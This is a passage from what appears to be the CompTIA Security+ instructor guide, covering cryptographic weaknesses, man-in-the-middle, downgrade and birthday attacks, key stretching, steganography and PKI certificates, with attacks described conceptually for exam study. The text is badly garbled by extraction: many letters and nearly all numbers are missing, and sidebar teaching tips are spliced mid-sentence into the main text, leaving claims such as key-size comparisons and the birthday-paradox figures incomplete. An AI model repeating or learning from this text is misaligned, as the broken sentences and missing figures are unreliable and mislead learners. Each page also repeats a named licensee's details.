use the key pair to exchange or agree on one or more AES cipher keys to use as
session keys.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 113

Cryptography Supporting Integrity and Resiliency Show Slide(s)

Integrity is proved by hashing algorithms, which allow two parties to derive the same Cryptography
checksum and show that a message or data has not been tampered with. A basic hash Supporting Integrity
function can also be used with a shared secret to create a message authentication and esiliency
code (MAC), which prevents a man in the middle tampering with the checksum.
Teaching
As well as providing integrity at the level of individual messages, cryptography can be Tip
used to design highly resilient control systems. A control system is one with multiple
C s Dr Ian Levy's
parts, such as sensors, workstations, and servers, and comple operating logic. uch article on designing
a system is resilient if compromise of a small part of the system is prevented from the security system
allowing compromise of the whole system. Cryptography assists this goal by ensuring for smart meters in
the authentication and integrity of messages delivered over the control system. the UK (ncsc.gov.
uk/information/
Integrity and resiliency are also an issue for computer code. If a threat actor has the smart security
administrator privileges, they can change the operation of legitimate code to make it behind the gb smart
work as malware. A developer can make tampering more difficult using obfuscation. metering system) is a
Obfuscation is the art of making a message difficult to understand. bfuscated source good example of some
of the considerations
code is rewritten in a way that does not a ect the way the computer compiles or that go into the design
e ecutes the code, but makes it difficult for a person reading the code to understand of a highly resilient
how it works. system.
Cryptography is a very e ective way of obfuscating a message, but unfortunately, it
is too e ective in the case of source code because it also means the code cannot be
understood e ecuted by the computer. At some point, the code must be decrypted to
be executed. The key used for decryption usually needs to be bundled with the source
code, and this means that you are relying on security by obscurity rather than strong
cryptography. Attempts to protect an embedded key while preserving the functionality
of the code—known as white box cryptography—have all been broken. There are no
commercial solutions currently available to overcome this problem, but the sub ect is
one of much research interest.

Cr pto raphic er ormance imitations Show Slide(s)

Di erences between ciphers make them more or less useful for resource constrained Cryptographic
environments. The main performance factors are as follows Performance
Limitations
• peed for symmetric ciphers and hash functions, speed is the amount of data per
second that can be processed. Asymmetric ciphers are measured by operations per Teaching
second. Speed has the most impact when large amounts of data are processed. Tip
• Time latency for some use cases, the time re uired to obtain a result is more The syllabus places
a lot of emphasis on
important than a data rate. or e ample, when a secure protocol depends on
limitations and use
ciphers in the handshake phase, no data transport can take place until the cases, so make sure
handshake is complete. This latency, measured in milliseconds, can be critical to students understand
performance. these factors.

• i e the security of a cipher is strongly related to the si e of the key, with longer
keys providing better security. Note that the key size cannot be used to make
comparisons between algorithms. or e ample, a bit CC key is stronger than
a bit A key. Larger keys will increase the computational overhead for each
operation, reducing speed and increasing latency.

• Computational overheads in addition to key si e selection, di erent ciphers

have unique performance characteristics. Some ciphers require more CPU and
memory resources than others, and are less suited to use in a resource constrained
environment.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 114 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

In selecting a product or individual cipher for a particular use case, a tradeo must
be achieved between the demand for the best security available and the resources
available for implementation.
• Low power devices some technologies or ciphers configured with longer keys
require more processing cycles and memory space. This makes them slower
and means they consume more power. Conse uently, some algorithms and key
strengths are unsuitable for handheld devices and embedded systems, especially
those that work on battery power. Another e ample is a contactless smart card,
where the card only receives power from the reader and has fairly limited storage
capacity, which a ects the ma imum key si e supported.

• Low latency uses—this can impact protocol handshake setup times. A longer
Show Slide(s) handshake will manifest as delay for the user, and could cause timeout issues
with some applications. Also, if cryptography is deployed with a real time sensitive
Cryptographic Security channel, such as voice or video, the processing overhead on both the transmitter
Limitations and receiver must be low enough not to impact the uality of the signal.
Teaching
Tip Cryptographic Security Limitations
You can illustrate a
weak key problem esource constraints may re uire you to make a tradeo between security and
by referencing the performance, but you cannot trade too far.
Debian pen L
vulnerability. Two lines ntrop and ea e s
of code in Debian's
OpenSSL package Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as
were removed when it represents a message in a human language or programming language or data
highlighted by a
debugging application.
structure. The plainte t must be ordered for it to be intelligible to a person, computer
These two lines processor, or database. ne of the re uirements of a strong cryptographic algorithm is
were responsible to produce a disordered cipherte t. ut another way, the cipherte t must e hibit a high
for ensuring that level of entropy. If any elements of order from the plainte t persist, it will make the
the keyspace was cipherte t vulnerable to cryptanalysis, and the algorithm can be shown to be weak.
large and random.
Conse uently, for It is important to reali e that ust because an algorithm, such as A , is considered
two years, Debian strong does not mean that the implementation of that cipher in a programming library
OpenSSL servers is also strong. The implementation may have weaknesses. It is vital to monitor the
using this patch were
status of this type of programming code and apply updates promptly. If a weakness
generating keys from
a range of about is revealed, any keys issued under the weak version must be replaced and data re
, . Another encrypted.
e ample is the N A
inserted backdoor in A weak key is one that produces ciphertext that is lower entropy than it should be. If
a N proposed for a key space contains weak keys, the technology using the cipher should prevent use
use with ECC (isaca. of these keys. D and RC4 are examples of algorithms known to have weak keys. The
org resources isaca way a cipher is implemented in software may also lead to weak keys being used. An
ournal issues e ample of this is a bug in the pseudo random number generator for the pen L
volume can elliptic
server software for Debian Linu , discovered in wiki.debian.org/SSLkeys). A
curve cryptography
be trusted a brief weak number generator leads to many published keys sharing a common factor. A
analysis of the cryptanalyst can test for the presence of these factors and derive the whole key much
security of a popular more easily. Conse uently, the true random number generator (TRNG) or pseudo
cryptosyste). RNG (PRNG) module in the cryptographic implementation is critical to its strength.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 115

Pseudo G working during key generation using GPG.

This method gains entropy from user mouse and keyboard usage.

You can read more about true versus pseudo random number generation at random.org.

Predictability and Reuse

Predictability is a weakness in either the cipher operation or within particular key values
that make a cipherte t lower entropy and vulnerable to cryptanalysis. euse of the
same key within the same session can cause this type of weakness. The C stream
cipher and some chained block modes of operation are not as secure as other cipher
modes, because they e hibit predictability. ften, it is necessary to use an additional
random or pseudo random value in con unction with the cipher
• Nonce—the principal characteristic of a nonce is that it is never reused ("number
used once within the same scope that is, with the same key value . It could be a
random or pseudo random value, or it could be a counter value.

• Initiali ation vector I the principal characteristic of an I is that it be random or

pseudo random . There may also be a re uirement that an I not be reused as with
a nonce , but this is not the primary characteristic.

• Salt this is also a random or pseudo random number or string. The term salt is
used specifically in con unction with hashing password values.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 116 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) on e it and Cr pto raphic Attac s

Longevity and Use of weak cipher suites and implementations can represent a critical vulnerability for
Cryptographic Attacks an organization. It means that data that it is storing and processing may not be secure.
It may also allow a malicious attacker to masquerade as it by creating spoofed digital
Teaching certificates, causing huge reputational damage.
Tip
eaknesses in certain ciphers make some unsafe to use and some that are considered
You might refer likely to be unsafe in the near term or medium term future. In one sense, longevity
to Schneier's Law
(schneier.com/blog/ is a measure of the confidence that people have in a given cipher. Cryptanalysis is
archives undertaken on encryption systems with the purpose of trying to detect weaknesses.
schneiers law.html). owever, if weaknesses discovered in a particular cipher or the implementation of a
cipher under research conditions lead to the deprecation of that algorithm, that does
not necessarily mean that the system is immediately vulnerable in practice.
C and D D are already deprecated. A is seen as approaching the end of its
usefulness, with CC and other algorithms o ering better security and performance
characteristics (thesslstore.com blog is it still safe to use rsa encryption . MD and
A have known weaknesses, but are not necessarily unsecure if compatibility is an
overriding concern.
In another sense, longevity is the consideration of how long data must be kept secure.
If you assume that a cipherte t will be e posed at some point, how long must that
cipherte t resist cryptanalysis or e ample, imagine an N A operative's laptop
is stolen. The thief cannot hope to break the encryption with current computing
resources, but how long must that encryption mechanism continue to protect the
data If advances in cryptanalysis will put it at risk within years, or years, or
years, could a more secure algorithm have been chosen There is always a tradeo
among security, cost, and interoperability. Malicious mathematical attacks are difficult
to launch, and the chances of success against up to date, proven technologies and
standards are remote. If a deprecated algorithm is in use, there is no need for panic,
but there will be a need for a plan to closely monitor the a ected systems and to
transition to better technologies as quickly as is practical.

Show Slide(s) Man-in-the-Middle and Downgrade Attacks

Man in the Middle and
Some attacks depend on capturing the communications between two parties. They do
Downgrade Attacks not break the cryptographic system but exploit vulnerabilities in the way it is used. A
man-in-the-middle ( IT ) attack is typically focused on public key cryptography.
1. Mallory eavesdrops the channel between Alice and Bob and waits for Alice to
request Bob's public key.

2. Mallory intercepts the communication, retaining ob's public key, and sends his
own public key to Alice.

3. Alice uses Mallory's key to encrypt a message and sends it to Bob.

4. Mallory intercepts the message and decrypts it using his private key.

5. Mallory then encrypts a message (possibly changing it) with Bob's public
key and sends it to ob, leaving Alice and ob oblivious to the fact that their
communications have been compromised.

This attack is prevented by using secure authentication of public keys, such as

associating the keys with certificates. This should ensure that Alice re ects Mallory's
public key.
A downgrade attack can be used to facilitate a man in the middle attack by
re uesting that the server use a lower specification protocol with weaker ciphers and
key lengths. or e ample, rather than use TL . , as the server might prefer, the client

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 117

requests the use of SSL. It then becomes easier for Mallory to forge the signature of a
certificate authority that Alice trusts and have Alice trust his public key.

e tretchin and altin Show Slide(s)

ntropy is a concern whenever a cryptographic system makes use of user generated ey tretching and
data, such as a password. sers tend to select low entropy passwords, because they Salting
are easier to remember. A couple of technologies try to compensate for this.

e tretchin
e stretchin takes a key that's generated from a user password and repeatedly
converts it to a longer and more random key. The initial key may be put through
thousands of rounds of hashing. This might not be difficult for the attacker to replicate
so it doesn't actually make the key stronger, but it slows the attack down, as the
attacker has to do all this extra processing for each possible key value. Key stretching
can be performed by using a particular software library to hash and save passwords
when they are created. The ass ord ased e eri ation unction is
very widely used for this purpose, notably as part of i i rotected Access A.

Salting
Passwords stored as hashes are vulnerable to brute force and dictionary attacks. A
password hash cannot be decrypted hash functions are one way. owever, an attacker
can generate hashes to try to find a match for password hash captured from network
traffic or password file. A brute force attack simply runs through every possible
combination of letters, numbers, and symbols. A dictionary attack creates hashes of
common words and phrases.
oth these attacks can be slowed down by adding a salt value when creating the hash,
so you compute
(salt + password) * SHA = hash
The salt is not kept secret, because any system verifying the hash must know the value
of the salt. It simply means that an attacker cannot use pre computed tables of hashes.
The hash values must be recompiled with the specific salt value for each password.

Collisions and the Birthday Attack Show Slide(s)

A birthday attack is a type of brute force attack aimed at exploiting collisions in Collisions and the
hash functions. A collision is where a function produces the same hash value for two Birthday Attack
di erent plainte ts. This type of attack can be used for the purpose of forging a digital
signature. The attack works as follows
1. The attacker creates a malicious document and a benign document that produce
the same hash value. The attacker submits the benign document for signing by
the target.

2. The attacker then removes the signature from the benign document and adds it
to the malicious document, forging the target's signature.

The trick here is being able to create a malicious document that outputs the same hash
as the benign document. The birthday paradox means that the computational time
required to do this is less than might be expected. The birthday paradox asks how large
must a group of people be so that the chance of two of them sharing a birthday is .
The answer is , but people who are not aware of the parado often answer around
. The point is that the chances of someone sharing a particular birthday are
small, but the chances of any two people sharing any birthday get better and better as
you add more people ... )

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 118 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

To e ploit the parado , the attacker creates multiple malicious and benign documents,
both featuring minor changes punctuation, e tra spaces, and so on . Depending on the
length of the hash and the limits to the non suspicious changes that can be introduced,
if the attacker can generate sufficient variations, then the chance of matching hash
outputs can be better than .
This means that to protect against the birthday attack, encryption algorithms must
demonstrate collision avoidance that is, to reduce the chance that di erent inputs
will produce the same output . To e ploit the birthday parado , the attacker generally
has to be able to manipulate both documents messages, referred to as a chosen prefix
attack (sha mbles.github.io). The birthday paradox method has been used successfully
to e ploit collisions in the MD function to create fake digital certificates that appear
to have been signed by a certificate authority in a trusted root chain trailofbits.files.
wordpress.com ame md .pdf).

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 119

Review Activity:
Cryptographic Use
ases and eaknesses
Answer the following uestions

1. True or false? Cryptography is about keeping things secret so they cannot

be used as the basis of a non-repudiation system.

alse the usages are not e clusive. There are di erent types of cryptography and
some can be used for non repudiation. The principle is that if an encryption method
cipher and key is known only to one person, that person cannot then deny having
composed a message. This depends on the algorithm design allowing recipients to
decrypt the message but not encrypt it.

2. How can cryptography support high resiliency?

A complex system might have to support many inputs from devices installed to
potentially unsecure locations. Such a system is resilient if compromise of a small
part of the system is prevented from allowing compromise of the whole system.
Cryptography assists this goal by ensuring the authentication and integrity of messages
delivered over the control system.

3. For which types of system will a cipher suite that exhibits high latency
e pro lematic

igh latency is not desirable in any system really, but it will a ect real time protocols
that e change voice or video most. In network communications, latency makes the
initial protocol handshake longer, meaning delay for users and possible application
timeout issues.

4. What is the relevance of entropy to cryptographic functions?

Entropy is a measure of how disordered something is. A disordered ciphertext is

desirable, because remaining features of order from the plainte t make the cipherte t
vulnerable to analysis. Identical plaintexts need to be initialized with random or
counter values when encrypted by the same key, and the cryptosystem needs a source
of randomness to generate strong keys.

5. Your company creates software that requires a database of stored

encrypted passwords. What security control could you use to make the
password database more resistant to brute force attacks?

sing a key stretching password storage library, such as D , improves resistance

to brute force cracking methods. ou might also mention that you could use policies to
make users choose longer, non trivial passwords.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 120 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 5D
Summari e ther
Cryptographic Technologies

Teaching EXAM OBJECTIVES COVERED

Tip 2.8 Summarize the basics of cryptographic concepts
This topic collects the
remaining content
examples from
ob ective . . hile
The landscape for developing and using cryptographic processes is continually
students need to know evolving. As a security professional, it is important that you keep up to date with these
these for the e am, trends so that you can recognize new opportunities for implementing better security
they are not critical controls and threats to existing controls caused by technological progress.
to understanding
authentication
and authorization Quantum and Post-Quantum
technologies. If
students are feeling Quantum refers to computers that use properties of quantum mechanics to
overloaded, you may significantly out perform classical computers at certain tasks.
want to skip this topic
or leave it to later in Computing
the course.
A quantum computer performs processing on units called qubits (quantum bits). A
Show Slide(s)
ubit can be set to or or an indeterminate state called a superposition, where there
is a probability of it being either or . The likelihood can be balanced or can
uantum and ost be weighted either way. The power of quantum computing comes from the fact that
uantum
ubits can be entangled. hen the value of a ubit is read, it collapses to either
or , and all other entangled ubits collapse at the same time. The strength of this
architecture is that a single operation can utilize huge numbers of state variables
represented as ubits, while a classical computer's C must go through a read,
e ecute, write cycle for each bit of memory. This makes uantum very well suited
to solving certain tasks, two of which are the factoring problem that underpins A
encryption and the discrete algorithm problem that underpins ECC.

Communications
hile uantum computing could put the strength of current cryptographic ciphers
at risk, it also has the promise of underpinning more secure cryptosystems. The
properties of entanglement, superposition, and collapse suit the design of a tamper
evident communication system that would allow secure key agreement.

Post-Quantum
Post-quantum refers to the expected state of computing when quantum computers
that can perform useful tasks are a reality. Currently, the physical properties of ubits
and entanglement make quantum computers very hard to scale up. At the time of
writing, the most powerful uantum computers have about ubits. A uantum
computer will need about a million qubits to run useful applications.
No one can predict with certainty if or when such a computer will be implemented.
In the meantime, NI T is running a pro ect to develop cryptographic ciphers that

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 121

are resistant to cracking even by quantum computers (csrc.nist.gov ro ects ost

uantum Cryptography).
More generally, cryptographic agility refers to an organization's ability to update the
specific algorithms used across a range of security products without a ecting the
business work ows that those products support cryptosense.com blog achieving
crypto agility).

Lightweight Cryptography
Another problem a ecting current cryptographic ciphers is use on low power devices.
NIST is hoping that a compact cipher suite will be be developed that is both quantum
resistant and that can run on battery powered devices with minimal C and memory
resources (csrc.nist.gov pro ects lightweight cryptography).

Homomorphic Encryption Show Slide(s)

Homomorphic encryption is principally used to share privacy sensitive data sets. Homomorphic
hen a company collects private data, it is responsible for keeping the data secure and Encryption
respecting the privacy rights of individual data subjects. Companies often want to use
third parties to perform analysis, however. haring unencrypted data in this scenario Teaching
is a significant risk. omomorphic encryption is a solution for this use case because Tip
it allows the receiving company to perform statistical calculations on fields within the e're keeping this
data while keeping the data set as a whole encrypted. or e ample, if you want to here as part of
perform analytics on customer interactions, an analysis tool will be able to sum logons ob ective . , but note
without any account identifiers like email addresses ever being decrypted. that it relates more
to data privacy, which
we'll get to later in the
loc chain course.

Blockchain is a concept in which an expanding list of transactional records is secured Show Slide(s)
using cryptography. Each record is referred to as a block and is run through a hash
function. The hash value of the previous block in the chain is added to the hash lockchain
calculation of the next block in the chain. This ensures that each successive block is
cryptographically linked. ach block validates the hash of the previous block, all the way
through to the beginning of the chain, ensuring that each historical transaction has not
been tampered with. In addition, each block typically includes a timestamp of one or
more transactions, as well as the data involved in the transactions themselves.
The blockchain is recorded in a public ledger. This ledger does not exist as an individual
file on a single computer rather, one of the most important characteristics of a
blockchain is that it is decentrali ed. The ledger is distributed across a peer to peer Show Slide(s)
(P2P) network in order to mitigate the risks associated with having a single point
of failure or compromise. Blockchain users can therefore trust each other equally.
teganography
Likewise, another defining uality of a blockchain is its openness everyone has the
same ability to view every transaction on a blockchain. Teaching
Blockchain technology has a variety of potential applications. It can ensure the integrity Tip
and transparency of financial transactions, online voting systems, identity management There are various
systems, notari ation, data storage, and more. owever, blockchain is still an emerging software applications
technology, and outside of cryptocurrencies, has not yet been adopted on a wide for inserting
and detecting
ranging scale. steganographic
messages. hen
te ano raph hiding messages in
files, a substitution
technique such as
Steganography (literally meaning "hidden writing") is a technique for obscuring the
least significant bit is
presence of a message. Typically, information is embedded where you would not preferable to simply
e pect to find it a message hidden in a picture, for instance. The container document inserting a message
or file is called the covertext. A steganography tool is software that either facilitates this as it does not alter the
file si e.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 122 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

or conversely that can be used to detect the presence of a hidden message within
a coverte t.
hen used to conceal information, steganography amounts to security by obscurity,
which is usually deprecated. owever, a message can be encrypted by some
mechanism before embedding it, providing confidentiality. The technology can also
provide integrity or non repudiation for e ample, it could show that something was
printed on a particular device at a particular time, which could demonstrate that it was
genuine or a fake, depending on conte t.
ne e ample of steganography is to encode messages within TC packet data fields to
create a covert message channel. Another approach is to change the least significant
bit of pi els in an image file. This can code a useful amount of information without
distorting the original image noticeably. Similar techniques can be used with other
media types as cover files, such as audio and video files.
These methods might be used for command and control or to e filtrate data covertly,
bypassing protection mechanisms such as data loss prevention DL blog.trendmicro.
com trendlabs security intelligence steganography and malware concealing code and
cc traffic ). Future developments may see use of steganography in streaming media or
voiceover I oI .

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 123

Review Activity:
ther ryptographic Technologies
Answer the following uestions

1. Which cryptographic technology is most useful for sharing medical records

with an analytics company?

Homomorphic encryption allows calculations to be performed while preserving privacy

and confidentiality by keeping the data encrypted.

2. You are assisting a customer with implementing data loss prevention

(DLP) software. Of the two products left in consideration, one supports
steganalysis of image data, but the other does not. What is the risk of
omitting this capability?

A threat actor could conceal information within an image file and use that to
bypass the DL system. ne thing to note is that attackers could find other ways to
implement coverte ts audio or video, for instance or abuse protocol coding. There
are many things that steganalysis needs to be able to scan for! You might also note
that steganography is not only a data e filtration risk. It can also be used to smuggle
malicious code into a host system.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 124 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 5
Summary
Teaching ou should be able to summari e types of cryptographic function hash algorithm,
Tip symmetric cipher, asymmetric cipher and e plain how they are used in hybrid
Check that students encryption products to provide confidentiality, integrity, authentication, and resiliency.
are confident about ou should also be able to identify limitations and weaknesses, plus common types of
the content that has cryptographic attacks. inally, you should be able to summari e other concepts, such as
been covered. If there uantum, blockchain, homomorphic encryption, and steganography.
is time, revisit any
content examples that
they have questions
about. If you have
used all the available
time for this lesson
block, note the issues,
and schedule time for
a review later in the
course.

Lesson 5: Summarizing Basic Cryptographic Concepts

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 6
Implementing Public Key Infrastructure

LESSON INTRODUCTION Teaching

Tip
Digital certificates and public key infrastructure I are critical services used to This lesson focuses
manage identification, authentication, and data confidentiality across most private and on the practical side
public networks. It is important that you understand the types of certificate that can be of implementing
issued and are able to apply e ective management principles when configuring and cryptographic
supporting these systems. infrastructure. ou
will be returning to
the actual systems
Lesson Objectives that use cryptography
authentication, L
In this lesson, you will TL , N, A, and
so on throughout the
• Implement certificates and certificate authorities. rest of the course.

• Implement I management.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 126 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 6A
Implement erti cates and
erti cate Authorities

Teaching EXAM OBJECTIVES COVERED

Tip 3.9 Given a scenario, implement public key infrastructure
As the previous lesson
covered a lot of
theory, you may prefer
to focus more on labs
A digital certificate is a public assertion of identity, validated by a certificate authority
for this topic. Most of CA . As well as asserting identity, certificates can be issued for di erent purposes, such
the content e amples as protecting web server communications or signing messages. Issuing certificates is
are straightforward. likely to be an important part of your day to day role as a security administrator.

Show Slide(s) u lic and ri ate e sa e

ublic and rivate ey
ublic key cryptography solves the problem of distributing encryption keys when you
sage want to communicate securely with others or authenticate a message that you send to
others.
Teaching
• hen you want others to send you confidential messages, you give them your
Tip
public key to use to encrypt the message. The message can then only be decrypted
This is a uick recap of
by your private key, which you keep known only to yourself.
the previous lesson.
e sure that students
• hen you want to authenticate yourself to others, you create a signature and sign
grasp the use of public
and private keys it by encrypting the signature with your private key. ou give others your public key
before attempting to to use to decrypt the signature. As only you know the private key, everyone can be
move on. assured that only you could have created the signature.

The basic problem with public key cryptography is that you may not really know with
whom you are communicating. The system is vulnerable to man in the middle attacks.
This problem is particularly evident with e commerce. ow can you be sure that a
shopping site or banking service is really maintained by whom it claims The fact that
the site is distributing public keys to secure communications is no guarantee of actual
identity. ow do you know that you are corresponding directly with the site using
its certificate ow can you be sure there isn't a man in the middle intercepting and
modifying what you think the legitimate server is sending you
Public key infrastructure (PKI) aims to prove that the owners of public keys are
who they say they are. nder I, anyone issuing public keys should obtain a digital
certificate. The validity of the certificate is guaranteed by a certificate authority CA .
The validity of the CA can be established using various models.

Show Slide(s) Certificate Authorities

Certificate Authorities
The certificate authorit CA is the entity responsible for issuing and guaranteeing
certificates. rivate CAs can be set up within an organi ation for internal
communications. Most network operating systems, including indows erver, have
certificate services. or public or business to business communications, however, the

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 127

CA must be trusted by each party. Third party CA services include IdenTrust, Digicert,
ectigo Comodo, oDaddy, and lobal ign. The functions of a CA are as follows
• rovide a range of certificate services useful to the community of users serviced by
the CA.

• nsure the validity of certificates and the identity of those applying for them
registration .

• stablish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.

• Manage the servers repositories that store and administer the certificates.

• erform key and certificate lifecycle management, notably revoking invalid

certificates.

icrosoft indows Server CA. (Screenshot used with permission from icrosoft.)

PKI Trust Models Show Slide(s)

The trust model is a critical I concept, and shows how users and di erent CAs are I Trust Models
able to trust one another.
Teaching
Single CA Tip
mphasi e that there
In this simple model, a single CA issues certificates to users users trust certificates
is not one single
issued by that CA and no other. The problem with this approach is that the single CA hierarchy for all
server is very e posed. If it is compromised, the whole I collapses. Is, and likewise,
there are many root
Hierarchical (Intermediate CA) CAs, one for each
discrete hierarchy.
In the hierarchical model, a single CA called the root issues certificates to several An organi ation can
intermediate CAs. The intermediate CAs issue certificates to sub ects leaf or end have its own root CA
entities . This model has the advantage that di erent intermediate CAs can be set up for its private I, for
e ample.
with di erent certificate policies, enabling users to perceive clearly what a particular
certificate is designed for. ach leaf certificate can be traced back to the root CA along Interaction
the certification path. This is also referred to as certificate chainin , or a chain of trust. Opportunity
The root's certificate is self signed. In the hierarchical model, the root is still a single how a certificate
point of failure. If the root is damaged or compromised, the whole structure collapses. hierarchy for a website
To mitigate against this, however, the root server can be taken o ine, as most of the such as comptia.org .
regular CA activities are handled by the intermediate CA servers.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 128 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

A certification path. The leaf certificate (www.globalsign.com) was issued by an intermediate

Extended alidation CA, and that CA s certificate was issued by the root CA.
(Screenshot used with permission from icrosoft.)

Another problem is that there is limited opportunity for cross certification that is, to
trust the CA of another organi ation. Two organi ations could agree to share a root
CA, but this would lead to operational difficulties that could only increase as more
organi ations oin. In practice, most clients are configured to trust multiple root CAs.

nline ersus ine CAs

An online CA is one that is available to accept and process certificate signing re uests,
publish certificate revocation lists, and perform other certificate management tasks.
ecause of the high risk posed by compromising the root CA, a secure configuration
involves making the root an o ine CA. This means that it is disconnected from any
network and usually kept in a powered down state. The root CA will need to be brought
Show Slide(s) online to add or update intermediate CAs.

egistration Registration Authorities and CSRs

Authorities and C s
egistration is the process by which end users create an account with the CA and
Teaching become authori ed to re uest certificates. The e act processes by which users are
Tip authori ed and their identity proven are determined by the CA implementation. or
Note that the CA does e ample, in a indows Active Directory network, users and devices can often auto
not generate the key enroll with the CA ust by authenticating to Active Directory. Commercial CAs might
pair and that the perform a range of tests to ensure that a sub ect is who he or she claims to be. It is
private key is not part in the CA's interest to ensure that it only issues certificates to legitimate users, or its
of the C . The private
key must be kept
reputation will su er.
securely on the host
or secure removable On a private network (such as a indows domain), the right to issue certificates of different
storage, such as a types must be carefully controlled. The indows CA supports access permissions for each
smart card . certificate type so that you can choose which accounts are able to issue them.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 129

hen a sub ect wants to obtain a certificate, it completes a certificate si nin

request (CSR) and submits it to the CA. The C is a ase A CII file containing the
information that the sub ect wants to use in the certificate, including its public key.
The CA reviews the certificate and checks that the information is valid. or a web
server, this may simply mean verifying that the sub ect name and fully ualified
domain name DN are identical, and verifying that the C was initiated by the
person administratively responsible for the domain, as identified in the domain's
I records. If the re uest is accepted, the CA signs the certificate and sends it to
the sub ect.
The registration function may be delegated by the CA to one or more registration Show Slide(s)
authorities (RAs). These entities complete identity checking and submit C s on
behalf of end users, but they do not actually sign or issue certificates. Digital Certificates

i ital Certificates Teaching

Tip
A di ital certificate is essentially a wrapper for a sub ect's public key. As well as the The . , I , and
public key, it contains information about the sub ect and the certificate's issuer or C standards aren't
guarantor. The certificate is digitally signed to prove that it was issued to the sub ect by listed in the syllabus,
so students should not
a particular CA. The sub ect could be a human user for certificates allowing the signing
need to learn them.
of messages, for instance or a computer server for a web server hosting confidential e include them here
transactions, for instance . ust for reference.

igital certificate details. (Screenshot used with permission from icrosoft.)

Digital certificates are based on the . standard approved by the International

Telecommunications nion and standardi ed by the Internet ngineering Taskforce
tools.ietf.org html rfc . The ublic ey Infrastructure I working group
manages the development of these standards. A also created a set of standards,
referred to as Public Key Cryptography Standards (PKCS), to promote the use of
public key infrastructure.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 130 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Certificate Attri utes

Certificate Attributes
The .
certificate. ome of the main fields are listed in the following table.
Teaching
Tip
b ect identifiers
IDs have been
removed as a content
e ample, but remain
in the acronym list.
The term is included in
the glossary, but you
might want to mention
here that these
attributes all have
numeric identifiers.
Interaction
Opportunity
how the attributes
of a web server
certificate in a
browser. irefo 's
certificate page is
more readable than
the standard indows
dialog.
standard defines the fields or attributes that must be present in the
Field Usage
erial number A number uni uely identifying the certifi
cate within the domain of its CA.
ignature algorithm The algorithm used by the CA to sign the
certificate.
Issuer The name of the CA.
alid from to Date and time during which the certificate
is valid.
ub ect The name of the certificate holder, e
pressed as a distinguished name DN . it
hin this, the common name CN part should
usually match either the fully ualified do
main name DN of the server or a user
email address.
ublic key ublic key and algorithm used by the certi
ficate holder.
tensions certificates can be defined with e tended
attributes, such as friendly sub ect or issuer
names, contact email addresses, and in
tended key usage.
ub ect alternative name AN This e tension field is the preferred mecha
nism to identify the DN name or names by
which a host is identified.

Show Slide(s) Subject Name Attributes

ub ect Name
hen certificates were first introduced, the common name (CN) attribute was used
Attributes to identify the DN by which the server is accessed, such as www.comptia.org.
This usage grew by custom rather than design, however. The CN attribute can contain
Teaching di erent kinds of information, making it difficult for a browser to interpret it correctly.
Tip Conse uently, the CN attribute is deprecated as a method of validating sub ect identity
